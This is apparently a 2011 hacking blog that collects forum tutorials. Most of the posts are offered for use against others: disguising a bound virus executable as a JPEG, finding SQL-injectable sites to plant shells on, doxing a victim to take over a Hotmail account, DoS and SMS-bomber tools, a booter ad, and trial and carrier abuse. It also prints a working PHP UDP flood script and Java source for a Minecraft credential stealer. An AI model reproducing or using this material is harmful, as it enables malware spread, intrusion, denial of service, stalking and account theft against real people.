30 September, 2011

[Tutorial] Hide your Virus in a Picture File [New Method]

Hide any file inside a picture!


Items Needed:
  • Any Icon Changer
  • A Binder
  • A Brain

1) Create your virus. We shall call it 'server1.exe' for now.

[Image: server1.png]

2) Get any picture file you want to distribute.

3) Bind the 'server1.exe' and your picture file with any binder, we'll call the binded file 'virus1.exe'.

[Image: bindere.th.png]

3.5) I reccomend Easy Binder 2.0, which comes with a bytes adder and a icon extractor, aswell as some really good packing options. I've uploaded it, virus free, to: http://www.mediafire.com/?igjy4dnn0zb
< This will be caught by your AV as "Binder/Kit". It is not a virus, it is a binder than is not undectable. If you don't wish to use it, that's fine, find your own.

4) Be sure you have 'Hide common extensions' unchecked in your Folder Options.

[Image: known.th.png]

5) Change the 'virus1.exe' to '%Picturename%.jpeg - %Email/Web Address%.com'. For example, we'll call it 'HPIC_119.jpeg - test@test.com'.

[Image: hpic.th.png]

.com works the same as .exe, except fewer people actually know that's what it really is.

6) If you plan on distributing your virus via MSN, please skip to 7. If you plan on distributing your virus via file upload sites, please skip to 8.

6.5) I reccomend Icon Extractor V3.8 FULL with Serial, that can be downloaded from this thread: http://www.hackforums.net/showthread.php?tid=232221

[Image: iconchange.th.png]

7) You will now need to change the icon from that ugly box. Find the picture you added to the file, and make it an icon. How? Find one of the various online Picture to Icon converters. Once your picture is a .ico, use your Icon Changer program to change the icon of the file to the .ico you just made from the picture. When you send it to people on MSN, it will show a small box of the picture inside.

[Image: msnz.th.png]

8) You will not need to change the icon from that ugly box. Using your Icon Changer program, find the .jpeg icon, and change the ugly box to the .jpeg icon.

[Image: downloadfq.th.png]

9) Conclusion. Your file will now look like a legit picture to 9/10 people. Some people do know that .com is an extension, but the average computer user will not see any difference, and will download it without hesitation.

Labels:

How To Find Vulnerable Websites | TUT |


First off you need to download the actual tool itself (No this is not my own tool)
Download ; virus scan is at the bottom.
http://www.mediafire.com/?dtnolcj562ca6ss


Once you've downloaded the file above you need to extract it to a place you will know where to find it. A picture of the programme itself is below.

[Image: dnjFaQ.png]

NOTE- Make sure you don't extract the tool away from the folder because that's where the dorks are.

Ok so now for the tutorial, this is a little long but who ever said hacking was easy?, just simply follow these steps bellow and then you will be successful in "hacking" your opponent.

Step 1 -First you will need to click the "Scanner" tab and then the little "+" icon on the "All dorks". Once done you will see a list like this ;
[Image: Qwsb0M.png]
this is called a "dork" you can pick anyone you want by clicking the little "+" icon again.

Step 2 - Next you will need to pick a specific "dork" i'm going to be using ASP with dork ; ".asp?bookID=" you can use any....it really doesn't matter. So now our stage process should be as shown below.
[Image: hkZGIS.png]

Step 3 - Now you will need to press the scan button, I can't really explain this part so I got a picture for you, make sure to press "Remove duplicates".
[Image: RQBeM5.png]

Step 4 - Once completed "Step 3" the next thing you will need to do is right click your list (the white part) and press "Send to SQLI Crawler" as so.
[Image: aYNRVU.png]

Step 5 - Once in the SQLI Crawler you will need to press "Crawl" this will find you the vulnerable links from the ones you just just imported, this didn't work for me as good as I was hoping because I used a dork basically that doesn't find many vulnerable sites, this tutorial is just an example of what it'l be like. [Image: CvFT8o.png]

Step 6) Following on from "Step 5" the list takes a while because the tool itself is finding if its vulnerable or not. It should look a little like this [Image: JJIF4i.png]

Step 7 - Once your list is populated you have now got yourself some vulnerable sites to SQL inject/upload shell.

I would of continued the tutorial into more depth of executing SQL injection with this tool but there's already tutorials around that you can use. If you need any help with SQL injecting/uploading a shell just PM me, I'll be more than happy to help. I know you might think this tutorial is well pointless but it's a simple way of finding vulnerable websites whilst using some of the best dorks. Oh and before you guys say isn't it better just using "Google" well in my opinion no, this method tells you if its vulnerable and gives you over +50 sites at a time which will keep you busy.

I hope you liked this tutorial and remember whenever hacking/exploiting sites always use a proxy, here's a few proxy's that I use.

http://www.hidemyass.com
http://www.newipnow.com
http://www.xitenow.com/ (best in my opinion)[/COLOR]

-Curt

EDIT: VIRUS SCAN FOR THE DOWNLOAD
PHP Code:
Antivirus    Version    Last update    Result
AhnLab
-V3    2011.04.12.01    2011.04.12    -AntiVir    7.11.6.66    2011.04.12    -Antiy-AVL    2.0.3.7    2011.04.12    -Avast    4.8.1351.0    2011.04.12    -Avast5    5.0.677.0    2011.04.12    -AVG    10.0.0.1190    2011.04.12    -BitDefender    7.2    2011.04.12    -CAT-QuickHeal    11.00    2011.04.12    -ClamAV    0.97.0.0    2011.04.12    -Commtouch    5.2.11.5    2011.04.06    -Comodo    8317    2011.04.12    -DrWeb    5.0.2.03300    2011.04.12    -Emsisoft    5.1.0.5    2011.04.12    -eSafe    7.0.17.0    2011.04.12    -eTrust-Vet    36.1.8268    2011.04.12    -F-Prot    4.6.2.117    2011.04.12    -F-Secure    9.0.16440.0    2011.04.12    -Fortinet    4.2.254.0    2011.04.12    -GData    22    2011.04.12    -Ikarus    T3.1.1.103.0    2011.04.12    -Jiangmin    13.0.900    2011.04.12    -K7AntiVirus    9.96.4360    2011.04.11    -Kaspersky    7.0.0.125    2011.04.12    -McAfee    5.400.0.1158    2011.04.12    -McAfee-GW-Edition    2010.1C    2011.04.12    -Microsoft    1.6702    2011.04.11    -NOD32    6037    2011.04.12    -Norman    6.07.07    2011.04.12    -Panda    10.0.3.5    2011.04.12    -PCTools    7.0.3.5    2011.04.12    -Prevx    3.0    2011.04.12    -Rising    23.53.01.06    2011.04.12    -Sophos    4.64.0    2011.04.12    -SUPERAntiSpyware    4.40.0.1006    2011.04.12    -Symantec    20101.3.2.89    2011.04.12    WS.Reputation.1
TheHacker    6.7.0.1.171    2011.04.12    
-TrendMicro    9.200.0.1012    2011.04.12    -TrendMicro-HouseCall    9.200.0.1012    2011.04.12    -VBA32    3.12.14.3    2011.04.12    -VIPRE    8999    2011.04.12    -ViRobot    2011.4.12.4406    2011.04.12    -VirusBuster    13.6.301.0    2011.04.12    -MD5bfcb8c5408fe750e431f2e843b8b85b8
SHA1
8107304ee63d3a41952f31f05094c26dc231ac9d
SHA256
4dd2985a1940f0cafdb92da4bf569edc29dbd614a4a2bd34c4082d759dc5ab7e
File size
5599232 bytes
Scan date
2011-04-12 20:05:29 (UTC)

Labels:

[TUT][MEGA]EASILY HACK HOTMAIL ACCOUNTS!! NO PROGRAMS!![TUT]

This is a complete tutorial on Doxing and Reverting
(Hacking Hotmail)

For the sake of simplicity, I will be using he instead of he/she and him instead of him/her.

FAQ

What is doxing?
Doxing is collecting data about the vict­im you are going to revert. This brings us to our next FAQ.
What is reverting?
Reverting is using your dox to reset the vic­tim's password using the "reset my password" form.

Doxing

  1. Find a vic­tim
  2. Find everything you can about him
  3. Write it down


Step one

Find a suitable vic­tim, if he has Facebook, it is all the better. Find out what social networking sites he is registered on, it will come in handy in the next step.

Step two

Next is to find out everything you can about the vic­tim. If you want, you can even stalk him in real life. I advise you use http://pipl.com/ and http://com.lullar.com/ first because they have a very good searching system. If you want, you can try out these links:
http://www.411.com/
http://www.ask.com/
http://www.bebo.com/
http://www.facebook.com/
http://www.flickr.com/
http://www.ip-adress.com/ipaddresstolocation/
http://www.myspace.com/
http://www.myyearbook.com/
http://www.searchenginez.com/findpeople.html
http://www.skipease.com/
http://www.sonico.com/
http://www.spock.com/
http://www.twitter.com/
http://www.usatrace.com/
http://www.whitepages.com
http://www.whois.com/
http://www.whois.net/
http://www.wink.com/
http://www.youtube.com
http://www.zabasearch.com/
http://www.zoominfo.com

Step three

Time to write all of that info down that you collected in step two. Here is a basic form you should fill out before attempting to revert.

Code:
Full name:
Primary Email:
Other Emails:
IP address:
Country:
Province/state:
Zip/Postal Code:
Phone number:
Cellphone number:
Mother's full name:
Father's full name:
Schools attended:
Birthplace:
Close friends:
This is not a complete list of items, you should tailor it to your needs.

Reverting

Time to revert the accounts. This tutorial will only cover reverting Hotmail accounts. Try this first: https://maccount.live.com/ac/resetpwdmai...95#InitPos If that fails, try this one for a complete revert: https://support.live.com/eform.aspx?prod...ct=eformcs

Labels:

Mob s60 trick(highspd w/o ip) [RELIANCE FREE NET FOR MOB]

Make a new profile
apn=rcommms
no proxy no port
dns setting
primary dns =8.8.8.8
secndry dns =8.8.4.4

now use any official appliction lyk opera ucweb etc
thank u

Labels:

23 September, 2011

Use airtel 2G internet with 3G speed


Hello friends, today I'll tell you how to use airtel 2G plan with 3G speed.

First of all activate 3G services on your number.

Now you need to activate 10MB for Rs8 with 1day validity (3G Plan) .

For that SMS 3G to 121 and you will receive a sms  ''3G services is already activated''.

There will be option of Data plans reply with 1 follow the instructions and activate that plan.

The plan will get activated or else you can call customer care and get it easly activated.

Once the plan is activated it will be valid till 12am mid-nite.

Do not use Internet.as soon as ur Plan gets activated.

Kindly activate 100MB plan for Rs.10 (2G Plan) 3Days Validity. Activate this plan by dialing *567#.

Once the Plan is activated u can see ur MB Balance is 100 MB with 3days Validity by dialing *123*6#.

That's it Guys !

After 3days your Rs.10 will get deducted and you will receive next 100MB with another 3 days validity with 3G speed.

That means u are paying Rs 100 for 1GB per mnth with 3G speed.

Please do not try to activate any other 2G plan like RS 46 or Rs 98 as it might be a risk ..

My friend is using this since 2 weeks and it appears to be working fine.

Labels:

How to reset mobile tracker on samsung phones ?

It's very common issue with mobile users, as many of us forget passwords that we set in past mainly because we want our passwords to be strong and unique.
Here, I propose a solution to reset your password for samsung mobiles. This method will enable you to reset password for mobile tracker as well as phone security code. Here's the procedude.

Turn off your phone.
Remove sim card and then turn on your phone again.
Type in *2767*782 # or *2767*782 # on your phone's home screen.
Wait for the phone to reboot automatically.
Now turn on your phone but with a sim card this time.
Goto menu » settings » security » phone lock and change your password.

Please note that default password is 00000000 or 0000

Labels:

22 September, 2011

[Free] Hacking Tool (DOSer, Email Spammer, SMS Bomber, etc.)

I DO NOT TAKE RESPONSIBILITY FOR WHAT YOU DO WITH THIS, USE THE SMS BOMBER ONLY ON PEOPLE WHO ARE AWARE YOU'RE DOING IT AND ARE FINE WITH IT.

All right, so I'm working on a combination of hacking tools.
Right now it's only about half done, after it's complete I will either make it $0.50 or have a $harecash link for downloading it.

Right now it'll be given for free until I complete it.
It has a DOSer, Email Spammer, MSN Freeze, $harecash Reflector, SMS Bomber and Spammer/Auto Clicker.

For the auto clicker, to make it press enter just put an empty line after your text.

Here's a screenshot:
[Image: jb2xjt6uo7s0Hc.png]

A virus total link:
http://www.virustotal.com/file-scan/repo...1315671999
It's totally a trojan, Mr. False Positive.

If you want the download link, post here.
By the way, if you evade the char limit, be LQ, flame, etc, I will not give it to you.

Labels:

[ FREE ] CybuR Booter [ 200+ Private Shells ]

CybuR Booter
Shells Online: 267


Downloads



Features:

200+ Private Dedicated Shells Online 24/7.
Can Hit Off Websites, Kids On Xbox Live In Seconds.

Shell Rotation So You Don't Keep Using The Same Shells.

Extremely Hard Hitting DDoS Shells Can Take Down Home Connections and Alot Of Websites.
Sexy GUI Thats Going To Change Every Update.

Labels:

[TUT] Unlimited ESET Smart Security - 30-Day Trials Forever [TUT]

Hey guys,

I haven't seen this posted yet, and I doubt that I'm the only one who has figured this out, but I just wanted to share this with the community.

If you're an ESET Smart Security 4 user and you're sick of getting blacklisted or struggling to find working and long-lasting username/password combos just do this:

1.) Copy and paste the URL below and paste it in your address bar


http://www.eset.com/download/trials/post.php?customerEmail=fhasuih@ufiasf.com&firstName=fnjioasdj&lastName=fjosifjio&countryId=95&productCode=110


2.) Change the colored text to any e-mail address that you want; it doesn't have to be real and can be totally random.

3.) Copy and paste the username and password generated for you into ESET and then update your virus signatures.

You now have a fresh 30-day trial! Whenever your time is about to run out just repeat the steps above and use another random e-mail and it will spit out another 30-day username and password combination for you.

I have been doing this for years and you can do this an unlimited amount of times.

Hope you guys find this helpful! :)

Labels:

[TuT] How to Keep your System Safe + Running Smoothly [/TuT]

All Credit for this Goes to Me, Myself, and only I. If you Repost this somewhere else, All I ask is that you Either give credit in the Following format, before and after the Tutorial:
Code:
This is NOT my tutorial; with permission I have copied it off http://www.hackforums.net. It was originally written by the user "Đaŕқ Łiŋĸ" -- so I take absolutely no credit for this, as I did not assist in any way, shape, nor form. Link to original tutorial:

http://www.hackforums.net/showthread.php?tid=253857

Thanks.
--

Hello, and Welcome to my own little Tutorial on how to keep your System running Safe and Efficiently. If you follow this guide from the Get-Go, then you should have little to no problems when it comes to Your own Security and the Effectiveness of your Machine. If your computer is running Horrendously slow, then I would suggest you wipe your Computer (Read Sec. #5), get a New version of Windows / Linux / Mac (or what-have you), and start from scratch. Keep in mind every Link provided here sends you to a Free Program site, and as a Hacker you need to get the Idea of "Paying" for anything OUT.


Legend-

(*) = A Link to this Program/Site is Provided within this Tutorial.
--
What will be discussed in this Tutorial:

1.) The Basics, and What Firewall should I use?

2.) Techniques when sorting through Potentially Dangerous links or Downloads.
3.) Well, I have a Firewall, and a Grasp of what to do and not do... How do I protect myself If I slip up, or get rid of whatever it is ailing my system?
4.) I don't want to take any chances. What do I do to check my computer for anything Malicious, and get rid of it?
5.) Fuck it. I'm starting over. What do I do?
6.) Links to material Mentioned within the Tutorial.
--

Section 1 : The Basics, and What Firewall should I use?


--


So, you want to be a Hacker? Want to Dabble in the Dark Arts that has been Looked down upon since the Days of Dial-up? Well, just keep the following in mind: "No matter what, there is always something more Cleverer then yourself. - Merlin "


--Part 1--


If your going to Survive on the Internet, then you are going to need a Shield. This shield is referred to as a Firewall. There has always been a Debate on which firewalls one should use, and which ones suck. Point blank, the Top 3 are the following, and It is up to you to Decide which one you wish to use.


#1 - COMODO Firewall and Internet Security (*)

#2 - Outpost Firewall (*)
#3 - Zone Alarm (*)

-These are Not listed in a Specific order, but I personally use COMODO Firewall. It is very Flexible, very easy to use, and for the most part is Hacker Friendly.


-Outpost has its own + and -'s about it, It's a little more Paranoid then COMODO, but still delivers outstanding Protection.


-Zone Alarm is probably the most annoying, as it will fret at the mere languish of the Word "Hack". However, it is very useful for Constant protection, and is Updated evenly (Just as the Others).



The purpose of a Firewall is to make sure that no Malicious programs are Downloaded onto your system without you knowing about it or approving it, and can even restrict access to certain connections going to/from your Computer.


Surfing the web without a Firewall is like screwing a 45 year old hooker; Don't take the chance, use Protection.


--Part Two--

This shouldn't really be in this TuT, but I thought I'd add it just to make sure.

-- Most (I'm pretty sure all, but still) Operating Systems come with a "De-fragmentation" application, and will allow your computer to automatically take strung out files and compress them, giving your System more memory and the Ability to perform tasks easier, for Longer, and quicker. Defrag weekly, and restart your computer after doing so.


After you have chosen yourself a Firewall, check out Sec. #2.


(If you are -Just- Re-formatting, please skip to Section 3. Failure to do such can put your system at Risk! If this is not the case, continue.)


--


Section 2 : Techniques when sorting through Potentially Dangerous links or Downloads.


--


Alright! You have your Firewall. Time to go Download some music and chill to re-live your success of achieving the Impossible; Internet Security! ...right?


No. You fail. You have a Wooden Shield, and I have Fiery Armor, and the biggest fucking Sword you've ever seen.... Also, of course, on fire.


You would lose. I promise.


Let's say your searching the Hackforums one day, and you come across a Thread providing Links to a Free Program that would otherwise be unattainable, or very difficult to crack. Well look at that.. They gave you a Link to the Program to Download. Noone else of course has seen the thread, and you are the first person to come across it, so there is not Guarantee as to the Authenticity of it. How do you tell if it is Malicious?


Easy. Get something that can scan the File(s), and give you an Accurate report on if it is Dangerous or not.


Lots of Hackers (Geeks too) use online scanners, rather then download anything that looks touchy. I've been guilty of this from time to time, but I'd rather be able to use a Program before a Website. Mainly because I am lazy, and I don't feel like opening another tab.


If you are this way, and want to use something easily, then I recommend to you Dr. Web LinkChecker (*). All you have to do is Right-Click the Link before you download it, move your Cursor to the Dr. Web option, and Left-Click. It will automatically search the file for anything Malicious, and report back to you.


There are some other ways to tell if your being Joked around with. For example, you want to Download a Song from a Specific Link, but the link is only 345KB in Size. Common sense should tell you; Any song, Compressed or not, that is about 4-5 minutes long is usually about 4-5 MB in size. 1 MB = 1024 KB. So, 345 KB = 1/3 Of 1 MB. That is Screaming Fail and Anguish. Use common sense and download Dr. Web (or use an Online scanner) and scan the File.


Keep in mind, Hackers will make there own files "FUD", which stands for Fully Undetectable, so caution is stressed when downloading anything from anyone. I implore you to do research on whatever song it is, whatever program, whatever it is, and see if there is a Safe + Legal Alternative to such. Google is your Friend.


Mainly all I can stress to you is only download files from a Trusted Provider or Source. I would trust someone here on the Hackforums with more Reputation and Publicity then someone with none, and I would trust a Moderator with even more, because they seem to be Trustable sources. But by all means, do NOT ever give anyone your Complete and Full trust. Whether on the Computer, or not.


Also. If you are using Limewire, Mp3 Rocket, Frostwire, or Bearshare... Just, Fuck, Go ahead and Reformat. Your hopeless. Don't ask why, just trust me.


--


Section 3 : Well, I have a Firewall, and a Grasp of what to do and not do... How do I protect myself If I slip up, or get rid of whatever it is ailing my system?


--


Your next step is going to be getting an Anti-Virus program.


There are literally hundreds of AV's out there, hell I'm actually in the Middle of Programming my own... but which one is the best?


Honestly, there is no *Best* one, and I refuse to Argue the fact. Not all Antiviruses are as Awesome or Horrible as their competitors, but I have the Top 3 that most Hackers here, on the HF, use or can at least give credit to.


#1- Avira AntiVir Personal (*)

#2- Avast! Free / Pro (*)
#3- Kaspersky (*)

All of these have their ups and downs. If you want Medium Protection, get Avast. Avira is, and will remain, my personal favorite because of it's User-Friendly Interface and Flexibility. Its also really keen on getting those otherwise difficult to get Files and Folders. Kaspersky is a basic one, is free, and also has a Nice Interface. It is your own choice.


Remember, having a Strong and Reliable Firewall and AntiVirus is crucial for anyone, not just Hackers. Choose Carefully, and do your own individual research on each one before downloading.


Be sure to do Daily scans on your computer with your Anti-Virus. All three of these all have built in scanners, with customizable times as to when it will scan.

--

Section 4 : I don't want to take any chances. What do I do to check my computer for anything Malicious, and get rid of it?


--


I could give you a List of what to use and sort through for this, but I will be plain and Blunt; Spybot : Search and Destroy (*).


This is hands down the best and most useful Spyware Scanner / Detection Program, and can get rid of Malicious Files with the click of a button. I implore you to use this, along with your Firewall and Antivirus, to give yourself the best sense of Security available. Combining this with Defragging can really make an Improvement on your System, and is more or less referred to as weekly "Maintenance" for your Computer.


Be sure to not let your Computer run when you are not home. Not only does it waste power, but your computer staying Idle for long periods of time can Burn Virtual memory, and that isn't good. Restart your Computer after every Virus scan and Defrag.


--


Section 5 : Fuck it. I'm starting over. What do I do?


--


If you have done everything above, but still your Computer acts Weird and Slow, then I recommend starting over. It's pretty simple, and I have just the Program for you.


Use DBAN : Boot and Nuke (*). Hence the name, you insert it into the Computers CDROM Drive, restart your Computer, and Get rid of Everything on the Drive.


Doing such will wipe your Computer Entirely CLEAN. Meaning, NOTHING. If you have any files, photos, etc. that is of value, by yourself a Flash-Drive and put it on the Drive. Make sure you scan the files, as putting the Virus that caused you to have to resort to such on a brand new computer is just... Stupid.


This program is very simple to use, as stated above. Put it in, Wham-Bam. Please, however, make sure you have another OS ready on a Seperate CDROM. Once you wipe the computer, everything is 100% Unrecoverable, and you will be unable to use the computer for anything until you reinstall a new Operating System. Which one you choose is at your own Discretion.


Additional Notes:


Countermeasure is a must if you plan to stay safe. As I come across new programs to prevent Keylogs, RATS, etc., I will post them here.


Anti-Keylogger: Keyscrambler (Google it)

Will crypt everything you type in Firefox.
--

Section 6 : Links to material Mentioned within the Tutorial.


--

Epic Credits Music:



Section 1-

COMODO Firewall and Internet Security


Outpost Firewall Pro 2009


Zone Alarm Firewall


Section 2-

Dr. Web Online Scanner

Section 3-

Avira Anti-Virus

Avast! Antivirus


Kaspersky Antivirus


Section 4-

Spybot: Search and Destroy

Section 5-

DBAN : Boot and Nuke

--


This is my first Public Tutorial. I usually don't do these, but I was in a good mood. I would prefer you don't flame the thread, both for your sake and my own. If there is something you think should be added or taken away, Pm me. Confronting me in this Thread is not the best idea on your part, as I will unleash the fury of a Thousand Fires upon you. No joke.


--


This is 100% by me, and is not leeched from any source whatsoever. I did this for those who know little to nothing about personal Security, and I hope I have assisted you.


--

Helpful quotes approved by myself
(02-16-2010 01:25 AM)The Flash Wrote:  I'd also recommend having a Windows XP Virtual Machine to test software from untrusted sources.

I'd rather Nuke it than my desktop :D

--
Have fun Searching the Net,

--
Đaŕқ Łiŋĸ

Labels:

★★★★ [FREE-TUT] How to remove almost any virus [WORKING] ★★★★

Most of you will know will know this already but it will come in handy with the people who dont know this. Infected yourself with your own keylogger/RAT? Follow these steps to remove it.

1. Go to here: http://www.malwarebytes.org/
2. Download it.
3. Scan and wait untill finished it will find the infected files and you will have a choice to remove them and remove them!
4. Restart your computer/laptop it will give you the choice to or not.

Start screen:
[Image: okmz.png]

Scanning, I put some keyloggers of mine and clicked them to show you how it works!:)
[Image: scanng.png]

Removing the virus's Just click remove selected.
[Image: asac.png]

Labels:

21 September, 2011

how to make a password protected folder.

Quote:
Code:
cls
@ECHO OFF
title Folder Personal
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Personal goto MDLOCKER
:CONFIRM
echo Are you sure u want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Personal "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set /p "pass=>"
if NOT %pass%==password goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Personal
echo Folder unlocked successfully
goto End
:FAIL
echo Invalid password
goto UNLOCK2
:FAIL2
echo Invalid password
goto end
:MDLOCKER
md Personal
echo Folder created successfully
goto End
:UNLOCK2
echo Last chance to enter correct password to unlock folder
set /p "pass=>"
if not %pass%==password goto FAIL2
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Personal
echo Folder unlocked successfully
:End

Here's a Site editing code. When on ANY website, copy and paste this code into the browser, and press enter. Here's the code:

javascript: document.body.contentEditable = 'true'; document.designMode = 'on'; void 0

Here's a code to create a Clock out of Notepad. Simply put this code into a notepad document, and save it as, CLOCK. Here it is:

.LOG



hope u liked my tut

Labels:

[TUT] Zip and UnZip Files in VB.NET

Hi all.

This is my tutorial to zip and unzip files.


First of all, create a new project and name it wathever you want.


Then the first thing what you have to do is add the reference that is called WindowBase

[Image: 1.png]

Then Customize your form.. I just let it simple

[Image: 2.png]

Now, double click on the Zip button to switch to your code window.

At the top, type in:
Code:
Imports System.IO.Packaging

Then in the Button1_Click sub from the Zip Button, add this code:
Code:
'The Path of the Zip file you want to create
Dim zippath As String = IO.Path.Combine(Application.StartupPath, "test.zip")

'Create New Zip File
Dim zip As ZipPackage = ZipPackage.Open(zippath, IO.FileMode.Create, IO.FileAccess.ReadWrite)

To add a file or folder, use this:
Code:
Dim part As PackagePart = zip.CreatePart(New Uri("/subfolder/calc.exe", UriKind.Relative), _
                                         Net.Mime.MediaTypeNames.Application.Zip, CompressionOption.Normal)

Dim bytes() As Byte = My.Computer.FileSystem.ReadAllBytes("c:\windows\system32\calc.exe")
part.GetStream.Write(bytes, 0, bytes.Length)

And finally, when you are done with adding files and/or folders close the zip creation.
Code:
zip.close()


Now you have the zip code, test your program and you will see something like this:


[Image: 3.png]



Congratulations!

But it's not finished yet. We have to unzip the file as well.
To do that, double click on the Unzip Button and the Button2_Click Sub will be generated.

Inside that sub, type this:

Code:
Dim zippath As String = IO.Path.Combine(Application.StartupPath, "test.zip")
Dim zip As ZipPackage = ZipPackage.Open(zippath, IO.FileMode.Open, IO.FileAccess.ReadWrite)

'Loop through every Packagepart
For Each p As PackagePart In zip.GetParts

    'Get Filename without path
    Dim FileName As String = p.Uri.ToString.Substring(p.Uri.ToString.LastIndexOf("/") + 1)

    'Create a new FileStream
    Dim tempstream As New IO.FileStream(Application.StartupPath & "\" & FileName, IO.FileMode.Create)

    'Copy stream to the tempstream
    p.GetStream.CopyTo(tempstream)

    tempstream.Close()
Next

'And at last
zip.Close()

Now test your program and if you did all things right, you will get something like this:

[Image: 4.png]


And that's all you have to do
Thumbsup

You can download the project here:

http://www.mediafire.com/?1hbffjodefwbj8i

Virustotal scan

http://www.virustotal.com/file-scan/repo...1311628040

Labels:

[HOST] MASS UDP with PHP

hello i want that my Shell make attack on 1 ip that start on 88.147.25.1 and end on 88.147.25.255
Mass Host
Code:
Example:
Host Start: 88.147.25.1
Host End: 88.147.25.255
Length (Second): 60
and attack to 88.147.25.2, 88.147.25.3, 88.147.25.4, 88.147.25.5 ... ETC

can make this?


Thanks


i used this code:

Code:
//UDP
if(isset($_GET['host'])&&is_numeric($_GET['time'])){
    $packets = 0;
    ignore_user_abort(TRUE);
    set_time_limit(0);

    $exec_time = $_GET['time'];

    $time = time();
    //print "Started: ".time('d-m-y h:i:s')."<br>";
    $max_time = $time+$exec_time;

    $host = $_GET['host'];

    for($i=0;$i<65000;$i++){
    $out .= 'X';
    }
    while(1){
    $packets++;
    if(time() > $max_time){
    break;
    }
    $rand = rand(1,65000);
    $fp = fsockopen('udp://'.$host, $rand, $errno,

$errstr, 5);
    if($fp){
    fwrite($fp, $out);
    fclose($fp);
    }
    }
$fp = fopen('log.php', 'a');
date_default_timezone_set('EST');
fwrite($fp, "UDP flood at " .date("d/m/y h:i") . " + 1 Hour DST,

Completed with " .

$packets . " (" . round(($packets*65)/1024, 2) . " MB) packets

averaging " .

round($packets/$exec_time, 2) . " packets per second. On IP:

".$_GET['host']." , For "

.$_GET['time']. " Seconds \n");
fclose($fp);
    echo "<br><b>UDP Flood</b><br>Completed with $packets (" .

round(($packets*65)/1024, 2) . " MB) packets averaging ".

round($packets/$exec_time, 2) .

" packets per second \n";
    echo '<br><br>
  <form action="'.$surl.'" method=GET>
  <input type="hidden" name="act" value="phptools">
  Host: <br><input type=text name=host><br>
  Length (seconds): <br><input type=text name=time><br>
  <input type=submit value=Go></form>';
}else{ echo '<br><b>UDP Flood</b><br>
    <form action=? method=GET>
    <input type="hidden" name="act"

value="phptools">
    Host: <br><input type=text name=host

value=><br>
    Length (seconds): <br><input type=text

name=time value=><br><br>
    <input type=submit value=Go></form>';
}

The ip is FALSE i used only for example :)

Labels:

Developing Social [Networking] Site - PHP

have been challenged by a fellow to create a social networking site for our district. Honestly.. I took this up because I honestly think it will help me learn.

Not only will it improve my PHP skills, but also my SQL skills. I am really looking forward to this. My PHP knowledge is low compared to many, but I believe it should be significantly larger by the end of this project.

I hope to have a rough skin done within 2 months.

My plans for the site are as follows:
  • Post Board (basic 'thread' where all posts go, giant wall) - September 20th, 2011
  • Member Profiles - October 18th, 2011
  • Finish basic posts and communication between members - November 10th, 2011
  • Allow for more advanced post/profile communications - December 1st, 2011
  • Allow for 'Teacher' accounts that will allow teachers to each have their own page, with sections for classwork, homework, presentations, documents, calendar, class schedules, etc - January 15th, 2012
  • Present to the school board - February 1st, 2012
  • Chat system integration (self-coded) - March 19th, 2012
  • March 20th -> Beyond: Re-check all source code. Make improvements where possible. Cut down the source. Continue to elaborate on improvements.

That is a rough outline of when I plan to have things done. To some, it may seem like a long while.. but I will probably be doing this by myself (at the start) and in my FREE time. That already cuts it down a bit :)

Anyway, has anyone else tackled something like this? I am looking forward to the adventure ahead :P

----
This will be my features board that I will keep updated.

Current Features/Advances:

6:04PM 9/19/2011

Added profile images and upload at your UserCP.

7:08PM 9/18/2011

Added checkboxes on post for mass delete.

3:50PM 9/18/2011

Added some MyCode

11:20PM 9/15/2011

Added Updates Page

Past Updates:

-Have a users
-Have individual profiles
-Have a base message board
-Have logout function
-Purchased Domain
-Purchased Hosting
-Added ability to delete posts
-Added registration
-Added a User List
-Added ability to delete users (option does not show up for account UID's 1 and 2)
-Changed some CSS to make things look better
-Currently only Admins (UID 1, 2) can see the userlist and only admins can delete posts.
-Added user profiles
#-Includes UID
#-Includes Username
#-Includes Recent Posts
#-Includes Total Number of Posts

Labels:

[Java] Minecraft Stealer [SOURCE]

Creditz DarkShadowz
Code:
import java.io.DataInputStream;
import java.io.File;
import java.io.FileInputStream;
import java.util.Random;
import javax.crypto.Cipher;
import javax.crypto.CipherInputStream;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.PBEParameterSpec;

/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/

/**
*
* @author DarkShadowz
*/
public class Main {

    public static File getMinecraftDir() {
  String os = System.getProperty("os.name", "").toLowerCase();
  String home = System.getProperty("user.home", ".");

  if (os.contains("win")) {
    String appdata = System.getenv("APPDATA");
    if (appdata != null) {
    return new File(appdata, ".minecraft");
    } else {
    return new File(home, ".minecraft");
    }
  } else if (os.contains("mac")) {
    return new File(home, "Library/Application Support/minecraft");
  } else {
    return new File(home, ".minecraft/");
  }
    }

    public static void main(String[] args) {
  try {
    Random random = new Random(43287234L);
    byte[] salt = new byte[8];
    random.nextBytes(salt);
    PBEParameterSpec pbeParamSpec = new PBEParameterSpec(salt, 5);
    SecretKey pbeKey = SecretKeyFactory.getInstance("PBEWithMD5AndDES").generateSecret(new PBEKeySpec("passwordfile".toCharArray()));
    Cipher cipher = Cipher.getInstance("PBEWithMD5AndDES");
    cipher.init(2, pbeKey, pbeParamSpec);
    File passFile = new File(getMinecraftDir(), "lastlogin");
    DataInputStream dis = null;
    if (cipher != null) {
    dis = new DataInputStream(new CipherInputStream(new FileInputStream(passFile), cipher));
    } else {
    dis = new DataInputStream(new FileInputStream(passFile));
    }
    System.out.println("Minecraft Account Stealer - By DarkShadowz");
    System.out.println("Username: " + dis.readUTF());
    System.out.println("Password: " + dis.readUTF());
    dis.close();
  } catch (Exception ex) {
    ex.printStackTrace();
  }
    }
}


Labels:

[FULLY-WORKING] Java Drive-By

